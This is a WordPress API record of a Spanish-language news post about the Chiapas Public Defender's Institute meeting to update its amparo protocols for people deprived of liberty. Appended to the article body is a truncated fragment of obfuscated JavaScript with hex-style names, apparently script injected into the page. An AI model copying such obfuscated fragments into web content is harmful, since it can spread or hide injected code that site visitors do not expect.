{"id":5292,"date":"2022-09-22T00:04:20","date_gmt":"2022-09-22T00:04:20","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5292"},"modified":"2022-09-22T00:04:21","modified_gmt":"2022-09-22T00:04:21","slug":"realiza-defensoria-publica-del-poder-judicial-actualizacion-de-protocolos-de-atencion-en-materia-de-amparo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5292","title":{"rendered":"Realiza Defensor\u00eda P\u00fablica del Poder Judicial actualizaci\u00f3n de protocolos de atenci\u00f3n en materia de Amparo"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"461\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-21-at-5.14.59-PM-1024x461.jpeg\" alt=\"\" class=\"wp-image-5293\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-21-at-5.14.59-PM-1024x461.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-21-at-5.14.59-PM-300x135.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-21-at-5.14.59-PM-768x346.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-21-at-5.14.59-PM-1536x691.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-21-at-5.14.59-PM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>-Con la finalidad de trazar una misma ruta de trabajo, se llev\u00f3 a cabo una reuni\u00f3n de trabajo para la actualizaci\u00f3n y homologaci\u00f3n de los criterios en la defensa p\u00fablica de atenci\u00f3n en materia de Amparo.<\/p>\n\n\n\n<p>21 de septiembre del. 2022. Tuxtla Guti\u00e9rrez, Chiapas.- Con el firme objetivo de actualizar los protocolos para la debida atenci\u00f3n de las personas privadas de su libertad, espec\u00edficamente en el \u00e1rea de Amparo; el director general del Instituto de la Defensor\u00eda P\u00fablica del Poder Judicial del Estado, Jorge Alberto Selvas Culebro; encabez\u00f3 una reuni\u00f3n de trabajo con defensoras y defensores p\u00fablicos adscritos al Juzgado Penal de El Amate.En este sentido, Selvas Culebro asever\u00f3 que con la actualizaci\u00f3n y la homologaci\u00f3n de los criterios en la defensa p\u00fabica en materia de Amparo, se busca que haya mayor agilidad, colaboraci\u00f3n y comunicaci\u00f3n entre las personas defensoras p\u00fablicas y el \u00e1rea de la Coordinaci\u00f3n de Amparos del Instituto a su cargo, as\u00ed como la implementaci\u00f3n de acciones que consoliden el derecho al acceso a la justicia por medio de las y os defensores p\u00fablicos de nuestra entidad.Finalmente, el director Jorge Alberto Selvas asever\u00f3 que esta reuni\u00f3n de trabajo sobre la homologaci\u00f3n de los protocolos se replicar\u00e1 en San Crist\u00f3bal de Las Casas, Tapachula, Palenque y Comit\u00e1n de Dom\u00ednguez, haciendo las visitas respectivas a las y los defensores p\u00fablicos para ofrecer un mejor servicio a las y los justiciables, tal y como lo ha instruido el magistrado presidente del Poder Judicial del Estado de Chiapas, Guillermo Ramos P\u00e9rez.En este encuentro estuvieron presentes, el subdirector regional de Defensor\u00eda P\u00fablica El Amate, Adri\u00e1n Maldonado V\u00e1zquez; el subdirector general del Instituto, Carlos Gerardo Pascacio Vel\u00e1zquez; el defensor p\u00fablico de la Unidad T\u00e9cnica Especializada en el Sistema Acusatorio Penal del Instituto, Jorge Alberto N\u00fa\u00f1ez Echeverr\u00eda; el subdirector de la Unidad T\u00e9cnica en Materia Penal y Justicia para Adolescentes  del Instituto, Neftal\u00ed Nucamendi Ruiz; el coordinador de Amparos de la Defensor\u00eda P\u00fablica, Jos\u00e9 Luis G\u00f3mez Mungu\u00eda en materia de Derechos de la Mujer, Ra\u00fal Grajales; as\u00ed como defensoras y defensores p\u00fablicos adscritos al juzgado Penal de El Amate.Direcci\u00f3n de Comunicaci\u00f3n Social y Relaciones P\u00fablicas61 7 87 00 Ext. 8020\/8021 f : \/poderjudicial.chiapas t : @PJE_Chiapas<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>-Con la finalidad de trazar una misma ruta de trabajo, se llev\u00f3 a cabo una reuni\u00f3n de trabajo para la actualizaci\u00f3n y homologaci\u00f3n de los criterios en la defensa p\u00fablica de atenci\u00f3n en materia de Amparo. 21 de septiembre del. 2022. Tuxtla Guti\u00e9rrez, Chiapas.- Con el firme objetivo de actualizar los protocolos para la debida &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5293,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-5292","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5292","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5292"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5292\/revisions"}],"predecessor-version":[{"id":5294,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5292\/revisions\/5294"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5293"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5292"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5292"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5292"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}